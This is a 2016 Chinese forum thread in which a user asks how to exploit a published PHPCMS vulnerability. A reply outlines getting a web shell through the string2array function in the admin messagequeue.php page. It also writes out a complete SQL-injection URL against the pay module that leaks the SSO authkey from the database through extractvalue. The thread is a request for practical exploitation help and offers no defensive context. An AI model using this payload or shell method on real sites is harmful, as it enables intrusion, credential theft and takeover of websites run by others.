求问一下此方式怎么利用

nsb171390582 · 发表于 2016-9-1 17:59:51

http://www.unhonker.com/bug/1907.html

这是地址，就是不怎么利用！

初九、 · 发表于 2016-9-2 13:11:48

利用【这里是域名】/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件，登陆phpsso_server后，提交即可。测试时，请修改form的action属性。

3、注入。访问链接：【这里是域名】/phpcmsv9/index.php?m=pay&c=respond&a=respond_get&code=kkk%89′ and extractvalue(1, concat(0x7e, (select substr(authkey,1,30) FROM v9_sso_applications where appid=1),0x7e))–%20m

能看懂么？

nsb171390582 · 发表于 2016-9-2 14:22:58

初九、发表于 2016-9-2 13:11
利用【这里是域名】/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另 ...

利用【这里是域名】/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件，登陆phpsso_server后，提交即可。测试时，请修改form的action属性。
这一段我就看不懂了怎么利用！

求问一下此方式怎么利用

RE: 求问一下此方式怎么利用

点评

RE: 求问一下此方式怎么利用

浏览过的版块

指导单位

旗下站点

联系我们